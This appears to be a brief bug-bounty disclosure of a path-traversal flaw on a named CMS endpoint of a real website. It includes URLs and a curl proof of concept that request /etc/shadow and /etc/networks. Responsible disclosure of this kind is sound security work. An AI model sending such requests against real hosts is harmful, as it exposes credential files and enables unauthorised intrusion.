Prelude.
I wasnβt going to report it, I thought it was your laboratory but after my first analysis this seems real.
Description
Itβs detected a path traversal as root user that allows to remote attackers see internal files as root.
https://portswigger.net/cms/audioitems//etc/networks
https://portswigger.net/cms/audioitems//etc/shadow
Poc
curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"
{F3132191}
Abilit to read internal files as root